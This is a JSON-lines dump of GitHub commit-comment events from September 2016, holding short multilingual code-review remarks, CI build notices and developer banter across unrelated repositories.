{"id":"4607939336","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"c42f/Displaz.jl"},"payload":{"comment":{"id":19144570,"position":null,"line":null,"path":null,"commit_id":"33d0c17dad48c5c08f7a168c632d3f47f03640c1","created_at":"2016-09-23T11:07:58Z","updated_at":"2016-09-23T11:07:58Z","body":"actually it's necessary there on 0.4 for `readstring`, so should be left in REQUIRE"}},"created_at":"2016-09-23T11:07:58Z"}
{"id":"4607940043","type":"CommitCommentEvent","actor":{"login":"aspanoz"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19144572,"position":10,"line":10,"path":".stylelintrc","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-23T11:08:10Z","updated_at":"2016-09-23T11:08:10Z","body":"bменно так всё и было ) я посмотрел на конфигурации стайллинтера и припух - уж очень много настроект, потому взял где-то этот пресет. Вроде жить не мешает, за аккуратностью оформления присматривает )"}},"created_at":"2016-09-23T11:08:10Z"}
{"id":"4607940060","type":"CommitCommentEvent","actor":{"login":"Jimmi08"},"repo":{"name":"Jimmi08/userlanguage_flags_menu"},"payload":{"comment":{"id":19144573,"position":null,"line":null,"path":null,"commit_id":"61e47d0d8f0d740587c8a38d2424855867fec56a","created_at":"2016-09-23T11:08:10Z","updated_at":"2016-09-23T11:08:10Z","body":"I will need to revert this.  You can have multilang site without multilang tables. \r\nThis just hide content of menu, not menu itself ( I ended with empty menu box)  "}},"created_at":"2016-09-23T11:08:10Z"}
{"id":"4607941917","type":"CommitCommentEvent","actor":{"login":"zpauly"},"repo":{"name":"zpauly/GitHub_Android"},"payload":{"comment":{"id":19144577,"position":null,"line":null,"path":null,"commit_id":"4926cb6cc12ba1da8cc346ded84fdb5a5509bb32","created_at":"2016-09-23T11:08:40Z","updated_at":"2016-09-23T11:08:40Z","body":"test comment for a commit"}},"created_at":"2016-09-23T11:08:40Z"}
{"id":"4607943792","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":19144587,"position":47,"line":419,"path":"src/guess.py","commit_id":"cad719f543c67c54830706543ee8c09d07495277","created_at":"2016-09-23T11:09:10Z","updated_at":"2016-09-23T11:09:10Z","body":"No need for a line break `\\` here, since the expression is enclosed in parenthesis."}},"created_at":"2016-09-23T11:09:10Z"}
{"id":"4607944032","type":"CommitCommentEvent","actor":{"login":"yasindilekci"},"repo":{"name":"isaaceindhoven/DotCMS-Language-Variables"},"payload":{"comment":{"id":19144589,"position":null,"line":null,"path":null,"commit_id":"7e2cf99b08abadf8114907cf0c4be74761bcd884","created_at":"2016-09-23T11:09:13Z","updated_at":"2016-09-23T11:09:13Z","body":"This was a merge."}},"created_at":"2016-09-23T11:09:13Z"}
{"id":"4607947028","type":"CommitCommentEvent","actor":{"login":"vgagarkin"},"repo":{"name":"rvrsrec/cinemastar"},"payload":{"comment":{"id":19144598,"position":null,"line":null,"path":null,"commit_id":"0d98bdfa7b2debf09e9e008d1c237033289c004c","created_at":"2016-09-23T11:10:01Z","updated_at":"2016-09-23T11:10:01Z","body":"красавчик"}},"created_at":"2016-09-23T11:10:01Z"}
{"id":"4607948116","type":"CommitCommentEvent","actor":{"login":"MarinaChekulina"},"repo":{"name":"MarinaChekulina/-5-52-"},"payload":{"comment":{"id":19144601,"position":45,"line":45,"path":"dict_algs.py","commit_id":"6ebe1ce0e8a01348c0a2363d2eb4f70343bedcb9","created_at":"2016-09-23T11:10:16Z","updated_at":"2016-09-23T11:10:16Z","body":"break\r\n"}},"created_at":"2016-09-23T11:10:16Z"}
{"id":"4607950494","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":19144608,"position":null,"line":null,"path":null,"commit_id":"c1aad1894933199245ce4b45fce62093196947fd","created_at":"2016-09-23T11:10:53Z","updated_at":"2016-09-23T11:10:53Z","body":"This looks like a TBC formula....are you sure it can be applied to classic as well? The example of \"Chilling Howl\" does not fit at all, since that spell did not exist in classic?"}},"created_at":"2016-09-23T11:10:53Z"}
{"id":"4607954020","type":"CommitCommentEvent","actor":{"login":"DomT4"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19144615,"position":null,"line":null,"path":null,"commit_id":"21e1537c91c34a445122357830b0802ca23d6dc0","created_at":"2016-09-23T11:11:46Z","updated_at":"2016-09-23T11:11:46Z","body":"_Should_ be fixed now."}},"created_at":"2016-09-23T11:11:46Z"}
{"id":"4607954860","type":"CommitCommentEvent","actor":{"login":"dg"},"repo":{"name":"nette/tracy"},"payload":{"comment":{"id":19144616,"position":5,"line":394,"path":"src/Tracy/assets/Bar/bar.js","commit_id":"798fbdb5e5a5e4cd3f2844a635f66f76b2757a9b","created_at":"2016-09-23T11:11:59Z","updated_at":"2016-09-23T11:11:59Z","body":"It seems you are right."}},"created_at":"2016-09-23T11:11:59Z"}
{"id":"4607958298","type":"CommitCommentEvent","actor":{"login":"devilmetal"},"repo":{"name":"devilmetal/hollow-earth"},"payload":{"comment":{"id":19144627,"position":9,"line":9,"path":"hollow-earth/engine/bcolors.py","commit_id":"0252e2aa5fd62655d7fc22412fa94415a70f63aa","created_at":"2016-09-23T11:12:56Z","updated_at":"2016-09-23T11:12:56Z","body":"Hà c'est de la merde !\r\n\r\nCorrige ça :\r\n\r\n- Code style\r\n- ça aussi"}},"created_at":"2016-09-23T11:12:56Z"}
{"id":"4607962041","type":"CommitCommentEvent","actor":{"login":"laxex"},"repo":{"name":"laxex/C_O_M_R_E_D"},"payload":{"comment":{"id":19144637,"position":null,"line":null,"path":null,"commit_id":"034278c73b1104254d7243e6818091a56c043168","created_at":"2016-09-23T11:13:55Z","updated_at":"2016-09-23T11:13:55Z","body":"Yeah, I made a bunch of changes, but didn't bother to commit any of them.  I'll try to make commits more organized in the future."}},"created_at":"2016-09-23T11:13:55Z"}
{"id":"4607962866","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19144638,"position":null,"line":null,"path":null,"commit_id":"56d72f207a3af51276caef6aecb86527db3d16e0","created_at":"2016-09-23T11:14:08Z","updated_at":"2016-09-23T11:14:08Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35968/testReport/) for this commit**"}},"created_at":"2016-09-23T11:14:08Z"}
{"id":"4607965572","type":"CommitCommentEvent","actor":{"login":"jackfranklin"},"repo":{"name":"jackfranklin/html-dist"},"payload":{"comment":{"id":19144647,"position":null,"line":null,"path":null,"commit_id":"22d3da538e46c2d423d773cf21c99f7af1572b2e","created_at":"2016-09-23T11:14:51Z","updated_at":"2016-09-23T11:14:51Z","body":"The README is up to date :)"}},"created_at":"2016-09-23T11:14:51Z"}
{"id":"4607972618","type":"CommitCommentEvent","actor":{"login":"ghzjtian"},"repo":{"name":"ghzjtian/TestGitHub"},"payload":{"comment":{"id":19144664,"position":null,"line":null,"path":null,"commit_id":"3b37f1839099f348e8d50f8ae614899b6ed85847","created_at":"2016-09-23T11:16:39Z","updated_at":"2016-09-23T11:16:39Z","body":"good news."}},"created_at":"2016-09-23T11:16:39Z"}
{"id":"4607975302","type":"CommitCommentEvent","actor":{"login":"kmsheng"},"repo":{"name":"rickie120243/converter-app"},"payload":{"comment":{"id":19144673,"position":31,"line":17,"path":"src/tibetdoc/index.html","commit_id":"f4edc16617fda5c5843dd0b4be062b3284d6dfe3","created_at":"2016-09-23T11:17:19Z","updated_at":"2016-09-23T11:17:19Z","body":"這是標準 HTML 標籤嗎 ? "}},"created_at":"2016-09-23T11:17:19Z"}
{"id":"4607976186","type":"CommitCommentEvent","actor":{"login":"szszszsz"},"repo":{"name":"privacyidea/privacyideaadm"},"payload":{"comment":{"id":19144676,"position":98,"line":97,"path":"privacyideautils/nitrokey.py","commit_id":"1d840ae834f1c59da7b01421c5280f28d2b94f96","created_at":"2016-09-23T11:17:32Z","updated_at":"2016-09-23T11:17:32Z","body":"Sure! #28 "}},"created_at":"2016-09-23T11:17:32Z"}
{"id":"4607978210","type":"CommitCommentEvent","actor":{"login":"tonjesus2016"},"repo":{"name":"tonjesus2016/Ola-Mundo"},"payload":{"comment":{"id":19144680,"position":1,"line":1,"path":"README.md","commit_id":"8095da33bce6ce17f14475c3bd7821062716d384","created_at":"2016-09-23T11:18:03Z","updated_at":"2016-09-23T11:18:03Z","body":"<div >Olá Mundo</div>"}},"created_at":"2016-09-23T11:18:03Z"}
{"id":"4607982393","type":"CommitCommentEvent","actor":{"login":"c42f"},"repo":{"name":"c42f/Displaz.jl"},"payload":{"comment":{"id":19144688,"position":null,"line":null,"path":null,"commit_id":"33d0c17dad48c5c08f7a168c632d3f47f03640c1","created_at":"2016-09-23T11:19:07Z","updated_at":"2016-09-23T11:19:07Z","body":"Ah yes thanks, it looks like I'd better quit messing with code for today and get some sleep."}},"created_at":"2016-09-23T11:19:07Z"}
{"id":"4607984058","type":"CommitCommentEvent","actor":{"login":"gmist"},"repo":{"name":"gae-init/gae-init"},"payload":{"comment":{"id":19144694,"position":33,"line":55,"path":"main/task.py","commit_id":"b88f2566acb4d86f546d1c79b828afaccdc8b26c","created_at":"2016-09-23T11:19:32Z","updated_at":"2016-09-23T11:19:32Z","body":"  =True,\r\n)"}},"created_at":"2016-09-23T11:19:32Z"}
{"id":"4607986352","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19144699,"position":43,"line":43,"path":"issue11-2/result.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-23T11:20:06Z","updated_at":"2016-09-23T11:20:06Z","body":"下記のように記載したところ、うまく表示されるようになりました！\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18784131/19ead9b0-81cb-11e6-99d8-807cfef0f38b.png)\r\n"}},"created_at":"2016-09-23T11:20:06Z"}
{"id":"4607988055","type":"CommitCommentEvent","actor":{"login":"Abukodonosor"},"repo":{"name":"Abukodonosor/some-examples"},"payload":{"comment":{"id":19144702,"position":null,"line":null,"path":null,"commit_id":"b8bf89f883da4ab41bb4032ad6f93c1c7b2b208d","created_at":"2016-09-23T11:20:33Z","updated_at":"2016-09-23T11:20:33Z","body":"Pokusaj pull and compare"}},"created_at":"2016-09-23T11:20:33Z"}
{"id":"4607992632","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"c42f/Displaz.jl"},"payload":{"comment":{"id":19144711,"position":null,"line":null,"path":null,"commit_id":"33d0c17dad48c5c08f7a168c632d3f47f03640c1","created_at":"2016-09-23T11:21:40Z","updated_at":"2016-09-23T11:21:40Z","body":"he says to the guy on the west coast at 4am :)"}},"created_at":"2016-09-23T11:21:40Z"}
{"id":"4607995260","type":"CommitCommentEvent","actor":{"login":"RaymondKroon"},"repo":{"name":"PDOK/featured"},"payload":{"comment":{"id":19144720,"position":19,"line":106,"path":"src/main/clojure/pdok/featured/json_reader.clj","commit_id":"b79deed861702b15cd3b378e07e308bd3c0ae562","created_at":"2016-09-23T11:22:20Z","updated_at":"2016-09-23T11:22:20Z","body":"Ik weet niet zeker wat ik van de naam vind. Het attr gedeelte klinkt een beetje dubbel"}},"created_at":"2016-09-23T11:22:20Z"}
{"id":"4607999763","type":"CommitCommentEvent","actor":{"login":"cebe"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19144727,"position":6,"line":27,"path":"framework/CHANGELOG.md","commit_id":"3ba72da6fa11c7565de7ceb002bdf6ff86c841d4","created_at":"2016-09-23T11:23:26Z","updated_at":"2016-09-23T11:23:26Z","body":"fixed. 3ec3ce9..81040e8"}},"created_at":"2016-09-23T11:23:26Z"}
{"id":"4608002000","type":"CommitCommentEvent","actor":{"login":"sehraf"},"repo":{"name":"RetroShare/RetroShare"},"payload":{"comment":{"id":19144737,"position":null,"line":null,"path":null,"commit_id":"7bddd4bcd49e9dfe606224e1a6cb7c106d723992","created_at":"2016-09-23T11:24:02Z","updated_at":"2016-09-23T11:24:02Z","body":"wait ... was this causing my bugs i'm reporting in #507 ?!"}},"created_at":"2016-09-23T11:24:02Z"}
{"id":"4608002725","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19144743,"position":null,"line":null,"path":null,"commit_id":"397538a7e11d784e49e224250e0f353dcf51ba08","created_at":"2016-09-23T11:24:13Z","updated_at":"2016-09-23T11:24:13Z","body":"With [this template](http://sprunge.us/NDQY) I could build clisp-2.4.9 for musl locally.\r\nThe musl build servers are down again, so perhaps wait until they're back.\r\n"}},"created_at":"2016-09-23T11:24:13Z"}
{"id":"4608002790","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"emacs-berlin/general-close"},"payload":{"comment":{"id":19144744,"position":null,"line":null,"path":null,"commit_id":"4544040b3498d7f734ecce251708cd70089cd63b","created_at":"2016-09-23T11:24:14Z","updated_at":"2016-09-23T11:24:14Z","body":"Please consider undoing this. It is not a good idea to bundle only vaguely related libraries in a single repository. Instead I would recommend that you move your werkstatt over to github and possibly even split it up, and then add the appropriate packages to Melpa and adjust the existing package's `Package-Requires` headers accordingly. If you need help with this, then I could provide it, but before putting any work into that, I would first like to know if you are open to the idea - thus this brief protest ;-)"}},"created_at":"2016-09-23T11:24:14Z"}
{"id":"4608003874","type":"CommitCommentEvent","actor":{"login":"mcyprian"},"repo":{"name":"fedora-python/pyp2rpm"},"payload":{"comment":{"id":19144747,"position":5,"line":39,"path":"pyp2rpm/metadata_extractors.py","commit_id":"fcffbc75aaefd97e13fd50cdedafb37225496e90","created_at":"2016-09-23T11:24:32Z","updated_at":"2016-09-23T11:24:32Z","body":"Client is set to None explicitly [here](https://github.com/fedora-python/pyp2rpm/blob/master/pyp2rpm/convertor.py#L235) according to value of attribute [pypi](https://github.com/fedora-python/pyp2rpm/blob/master/pyp2rpm/convertor.py#L62). At this moment this should be the only reason of None value of client variable. I agree, this message could be a bit misleading because None is an implicit value of client argument."}},"created_at":"2016-09-23T11:24:32Z"}
{"id":"4608003886","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19144748,"position":null,"line":null,"path":null,"commit_id":"5c78cdd721c036a56e978920f48a58fbd3b3d329","created_at":"2016-09-23T11:24:32Z","updated_at":"2016-09-23T11:24:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1142](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14101&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T11:24:32Z"}
{"id":"4608010690","type":"CommitCommentEvent","actor":{"login":"claudia-lat"},"repo":{"name":"claudia-lat/MAPest"},"payload":{"comment":{"id":19144758,"position":24,"line":69,"path":"Experiments/23links_human/main.m","commit_id":"dff91ce13fbd5b3f7daaa98b350b2971b00d782a","created_at":"2016-09-23T11:26:12Z","updated_at":"2016-09-23T11:26:12Z","body":"Function `extractForceplateData` is missing in the commit!"}},"created_at":"2016-09-23T11:26:12Z"}
{"id":"4608011901","type":"CommitCommentEvent","actor":{"login":"AndrejGit"},"repo":{"name":"AndrejGit/pGUI"},"payload":{"comment":{"id":19144761,"position":null,"line":null,"path":null,"commit_id":"65e20745d0bf8f2bd3dc1c13b3b8ef553dfff608","created_at":"2016-09-23T11:26:29Z","updated_at":"2016-09-23T11:26:29Z","body":"Line 103 is where the problem was fixed."}},"created_at":"2016-09-23T11:26:29Z"}
{"id":"4608012454","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19144764,"position":43,"line":43,"path":"issue11-2/result.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-23T11:26:37Z","updated_at":"2016-09-23T11:26:37Z","body":"おお、いいですね！\r\n\r\n｛ break;｝\r\nの部分ではなかったですね(if文見逃してましたね;)\r\n\r\n直ったようで何よりです！"}},"created_at":"2016-09-23T11:26:37Z"}
{"id":"4608012844","type":"CommitCommentEvent","actor":{"login":"hiyuh"},"repo":{"name":"libusb/libusb"},"payload":{"comment":{"id":19144765,"position":3,"line":3,"path":"examples/testlibusb.c","commit_id":"bcac08d60facba5f92d0ccfe548dea2da86f9113","created_at":"2016-09-23T11:26:42Z","updated_at":"2016-09-23T11:26:42Z","body":"\"mac.ccom\" looks a typo."}},"created_at":"2016-09-23T11:26:42Z"}
{"id":"4608014162","type":"CommitCommentEvent","actor":{"login":"claudia-lat"},"repo":{"name":"claudia-lat/MAPest"},"payload":{"comment":{"id":19144768,"position":28,"line":73,"path":"Experiments/23links_human/main.m","commit_id":"dff91ce13fbd5b3f7daaa98b350b2971b00d782a","created_at":"2016-09-23T11:27:01Z","updated_at":"2016-09-23T11:27:01Z","body":"@MartaLorenzini Function `extractRobotData` is missing in the commit!"}},"created_at":"2016-09-23T11:27:01Z"}
{"id":"4608017330","type":"CommitCommentEvent","actor":{"login":"claudia-lat"},"repo":{"name":"claudia-lat/MAPest"},"payload":{"comment":{"id":19144774,"position":29,"line":74,"path":"Experiments/23links_human/main.m","commit_id":"dff91ce13fbd5b3f7daaa98b350b2971b00d782a","created_at":"2016-09-23T11:27:46Z","updated_at":"2016-09-23T11:27:46Z","body":"@MartaLorenzini Function `dataSync` is missing in the commit!"}},"created_at":"2016-09-23T11:27:46Z"}
{"id":"4608019234","type":"CommitCommentEvent","actor":{"login":"Wedge009"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19144778,"position":18,"line":223,"path":"src/editor/map/map_context.cpp","commit_id":"c29ea4e2612fd919bb48ae25ebb2f01fccbc3231","created_at":"2016-09-23T11:28:11Z","updated_at":"2016-09-23T11:28:11Z","body":"Just wondering how this fixes a test. Because this seems to break the Editor - see https://gna.org/bugs/?25093."}},"created_at":"2016-09-23T11:28:11Z"}
{"id":"4608019669","type":"CommitCommentEvent","actor":{"login":"claudia-lat"},"repo":{"name":"claudia-lat/MAPest"},"payload":{"comment":{"id":19144782,"position":27,"line":72,"path":"Experiments/23links_human/main.m","commit_id":"dff91ce13fbd5b3f7daaa98b350b2971b00d782a","created_at":"2016-09-23T11:28:17Z","updated_at":"2016-09-23T11:28:17Z","body":"@MartaLorenzini Function`suitTimeInit` is missing in the commit!"}},"created_at":"2016-09-23T11:28:17Z"}
{"id":"4608021006","type":"CommitCommentEvent","actor":{"login":"pst"},"repo":{"name":"skippbox/ansible-cloudstack"},"payload":{"comment":{"id":19144785,"position":15,"line":78,"path":"roles/k8s/templates/k8s-node.j2","commit_id":"d6bc4b26a37b43bc60d4d43530ee1e45d244e791","created_at":"2016-09-23T11:28:36Z","updated_at":"2016-09-23T11:28:36Z","body":"I am currently working on a HA / production ready deployment with multiple master and dedicated and secured etcd. Loadbalancing and volumes are things I will look into that after that."}},"created_at":"2016-09-23T11:28:36Z"}
{"id":"4608021247","type":"CommitCommentEvent","actor":{"login":"bcostlow"},"repo":{"name":"cohpy/challenge-201608-refactor"},"payload":{"comment":{"id":19144786,"position":null,"line":null,"path":null,"commit_id":"8c242cf8dadeb494061419be1adf69d581b3db5f","created_at":"2016-09-23T11:28:39Z","updated_at":"2016-09-23T11:28:39Z","body":"Not exactly simple, but maybe if you tokenize the string using the\ntokenizer lib, and validate that either the tokentype is  number, --or--\nthe tokentype is  op, --or-- if tokentype is name, the tokenname is in a\nwhitelist.\n\nIf it checks out, untokenize and eval, if not, raise an error.\n\nOn Thu, Sep 22, 2016 at 4:46 PM, James Prior <notifications@github.com>\nwrote:\n\n> bcostlow wrote:\n>\n> > The bit of code using eval is actually quite clever. An interesting\n> problem\n> > might be, how do you safely (but still simply) have the same\n> functionality?\n>\n> I do not know of a simple way\n> to make eval() and friends safe from injection attacks.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cohpy/challenge-201608-refactor/commit/8c242cf8dadeb494061419be1adf69d581b3db5f#commitcomment-19136672>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADbf23EGgrNgfzNbCARzpbqkMTj45Rrks5qsuk9gaJpZM4KDF_P>\n> .\n>\n"}},"created_at":"2016-09-23T11:28:39Z"}
{"id":"4608025246","type":"CommitCommentEvent","actor":{"login":"dorkbox"},"repo":{"name":"dorkbox/SystemTray"},"payload":{"comment":{"id":19144794,"position":null,"line":null,"path":null,"commit_id":"3d8459ecc377e9f7cb49d4a2856bf4f328607775","created_at":"2016-09-23T11:29:40Z","updated_at":"2016-09-23T11:29:40Z","body":"I actually moved them over to the util package ...  but as of a few minutes ago they are completely gone :)"}},"created_at":"2016-09-23T11:29:40Z"}
{"id":"4608028290","type":"CommitCommentEvent","actor":{"login":"c42f"},"repo":{"name":"c42f/Displaz.jl"},"payload":{"comment":{"id":19144805,"position":null,"line":null,"path":null,"commit_id":"33d0c17dad48c5c08f7a168c632d3f47f03640c1","created_at":"2016-09-23T11:30:22Z","updated_at":"2016-09-23T11:30:22Z","body":"Hah touche!  I'm making stupid mistakes and it's only 9:30 in the evening.\r\n\r\nWhat can I say?  I'll blame the magical combination of young children, and trying to keep the caffine intake under control.  Yes, yes, that must be it ;-)"}},"created_at":"2016-09-23T11:30:22Z"}
{"id":"4608028526","type":"CommitCommentEvent","actor":{"login":"kloun"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19144807,"position":null,"line":null,"path":null,"commit_id":"8c7f99a8fe16592f5e54a96eb9b88eab6fa3890b","created_at":"2016-09-23T11:30:25Z","updated_at":"2016-09-23T11:30:25Z","body":"all from http://www.viva64.com/en/b/0431/"}},"created_at":"2016-09-23T11:30:25Z"}
{"id":"4608028887","type":"CommitCommentEvent","actor":{"login":"nook-ru"},"repo":{"name":"bitrix-expert/bitrix_boilerplate"},"payload":{"comment":{"id":19144808,"position":null,"line":null,"path":null,"commit_id":"4bbfa3f50e2d52e70adbbb2c25e1976ab458281c","created_at":"2016-09-23T11:30:31Z","updated_at":"2016-09-23T11:30:31Z","body":"Но уже хотя бы что-то.\r\n\r\nВ оригинале скрипт установки обязательно должен лежать в `DOCUMENT_ROOT`, возможно на это код завязан где-то.\r\n\r\nС обфусцированным wizard.php у меня так:\r\n\r\n```\r\n$ php -f install.php\r\nRunning installer step create_database...\r\n[InstallWizardException]\r\nОшибка соединения с сервером баз данных. Проверьте правильность введенных параметров.  (1045) Access denied for user ''@'localhost' (using password: NO) (0)\r\n\\xxx\\install.inc.php:25\r\n#0: InstallWizardException::check(object)\r\n        \\xxx\\install.php:67\r\n----------\r\n```\r\n\r\nС исходниками почему-то иначе. Чем-то всё же отличаются:\r\n\r\n```\r\n$ php -f install.php\r\nRunning installer step create_database...\r\n[Error]\r\nCall to undefined function mysql_connect() (0)\r\n\\xxx\\bitrix\\modules\\main\\install\\wizard\\wizard.php:1497\r\n#0: CreateDBStep->CreateMySQL()\r\n        \\xxx\\bitrix\\modules\\main\\install\\wizard\\wizard.php:1403\r\n#1: CreateDBStep->OnPostForm()\r\n        \\xxx\\install.php:66\r\n----------\r\n```"}},"created_at":"2016-09-23T11:30:31Z"}
{"id":"4608033805","type":"CommitCommentEvent","actor":{"login":"lbguilherme"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19144817,"position":47,"line":964,"path":"src/compiler/crystal/semantic/main_visitor.cr","commit_id":"26abbe9f2b4cb5dae9fd55164b75db5a85e1adf3","created_at":"2016-09-23T11:31:45Z","updated_at":"2016-09-23T11:31:45Z","body":"wrongly commited?"}},"created_at":"2016-09-23T11:31:45Z"}
{"id":"4608034060","type":"CommitCommentEvent","actor":{"login":"mcyprian"},"repo":{"name":"fedora-python/pyp2rpm"},"payload":{"comment":{"id":19144818,"position":11,"line":42,"path":"pyp2rpm/metadata_extractors.py","commit_id":"fcffbc75aaefd97e13fd50cdedafb37225496e90","created_at":"2016-09-23T11:31:50Z","updated_at":"2016-09-23T11:31:50Z","body":"Yes, some unexpected values of attributes name and version for example."}},"created_at":"2016-09-23T11:31:50Z"}
{"id":"4608034972","type":"CommitCommentEvent","actor":{"login":"Sim-fff"},"repo":{"name":"Sim-fff/Blackaksay"},"payload":{"comment":{"id":19144819,"position":null,"line":null,"path":null,"commit_id":"f692c42ae764d0e71e0713fa8d812ef166ce58c6","created_at":"2016-09-23T11:32:04Z","updated_at":"2016-09-23T11:32:04Z","body":"![2016-08-15 14-43-15](https://cloud.githubusercontent.com/assets/22250832/18784387/6cc26062-819a-11e6-8d6f-b8b689286b6a.JPG)\r\n"}},"created_at":"2016-09-23T11:32:04Z"}
{"id":"4608036210","type":"CommitCommentEvent","actor":{"login":"BoscoBecker"},"repo":{"name":"BoscoBecker/APIRESTXE10"},"payload":{"comment":{"id":19144822,"position":null,"line":null,"path":null,"commit_id":"6d93c2a519b4b1e7f831b1db2f7d127c29d368fb","created_at":"2016-09-23T11:32:23Z","updated_at":"2016-09-23T11:32:23Z","body":"API REST usando como meio comunicação JSON"}},"created_at":"2016-09-23T11:32:23Z"}
{"id":"4608041237","type":"CommitCommentEvent","actor":{"login":"oknet"},"repo":{"name":"apache/trafficserver"},"payload":{"comment":{"id":19144831,"position":14,"line":981,"path":"iocore/net/SSLNetVConnection.cc","commit_id":"ba4d53844109dba181e3d263b3e0d99680606e25","created_at":"2016-09-23T11:33:46Z","updated_at":"2016-09-23T11:33:46Z","body":"@jpeach  this->ssl may be NULL if make_ssl_connection() failed.\r\n\r\n```\r\n     if (this->ssl == NULL && (this->ssl = make_ssl_connection(ssl_NetProcessor.client_ctx, this)) {\r\n\r\n#if TS_USE_TLS_SNI\r\n...\r\n#endif\r\n     } else { // this->ssl == NULL\r\n...\r\n     }\r\n```"}},"created_at":"2016-09-23T11:33:46Z"}
{"id":"4608045282","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19144845,"position":null,"line":null,"path":null,"commit_id":"5c78cdd721c036a56e978920f48a58fbd3b3d329","created_at":"2016-09-23T11:34:53Z","updated_at":"2016-09-23T11:34:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1142](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14101&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:10:21"}},"created_at":"2016-09-23T11:34:53Z"}
{"id":"4608046965","type":"CommitCommentEvent","actor":{"login":"Sim-fff"},"repo":{"name":"Sim-fff/Blackaksay"},"payload":{"comment":{"id":19144855,"position":2,"line":2,"path":"README.md","commit_id":"f692c42ae764d0e71e0713fa8d812ef166ce58c6","created_at":"2016-09-23T11:35:20Z","updated_at":"2016-09-23T11:35:20Z","body":"![2016-08-15 14-43-15](https://cloud.githubusercontent.com/assets/22250832/18784447/d34ec258-819a-11e6-976a-7d99c5a0043d.JPG)\r\n"}},"created_at":"2016-09-23T11:35:20Z"}
{"id":"4608048552","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19144857,"position":null,"line":null,"path":null,"commit_id":"cfa14912f2f079b64808b6fefe18c542ed553135","created_at":"2016-09-23T11:35:46Z","updated_at":"2016-09-23T11:35:46Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Aeg3oTFPQKWAjaw_klRnUA"}},"created_at":"2016-09-23T11:35:46Z"}
{"id":"4608055633","type":"CommitCommentEvent","actor":{"login":"renai96"},"repo":{"name":"GTX96/Quicksort"},"payload":{"comment":{"id":19144875,"position":null,"line":null,"path":null,"commit_id":"c8ec2b525b4712f039b2f4e6fd2030bcede33f5f","created_at":"2016-09-23T11:37:42Z","updated_at":"2016-09-23T11:37:42Z","body":"very good code!"}},"created_at":"2016-09-23T11:37:42Z"}
{"id":"4608056178","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19144878,"position":19,"line":19,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-23T11:37:51Z","updated_at":"2016-09-23T11:37:51Z","body":"ご指摘の通りです。$id残して削除しました。"}},"created_at":"2016-09-23T11:37:51Z"}
{"id":"4608059613","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19144896,"position":16,"line":22,"path":"modules/custom/htn/css/nghia.css","commit_id":"4e29c0e65957c54b5ff7424c67ce18c1f064aa4e","created_at":"2016-09-23T11:38:42Z","updated_at":"2016-09-23T11:38:42Z","body":".layout-center vẫn là class chung, chỗ này nên lấy id của form"}},"created_at":"2016-09-23T11:38:42Z"}
{"id":"4608060681","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19144901,"position":35,"line":193,"path":"modules/custom/htn/css/nghia.css","commit_id":"4e29c0e65957c54b5ff7424c67ce18c1f064aa4e","created_at":"2016-09-23T11:38:57Z","updated_at":"2016-09-23T11:38:57Z","body":"thêm id của form"}},"created_at":"2016-09-23T11:38:57Z"}
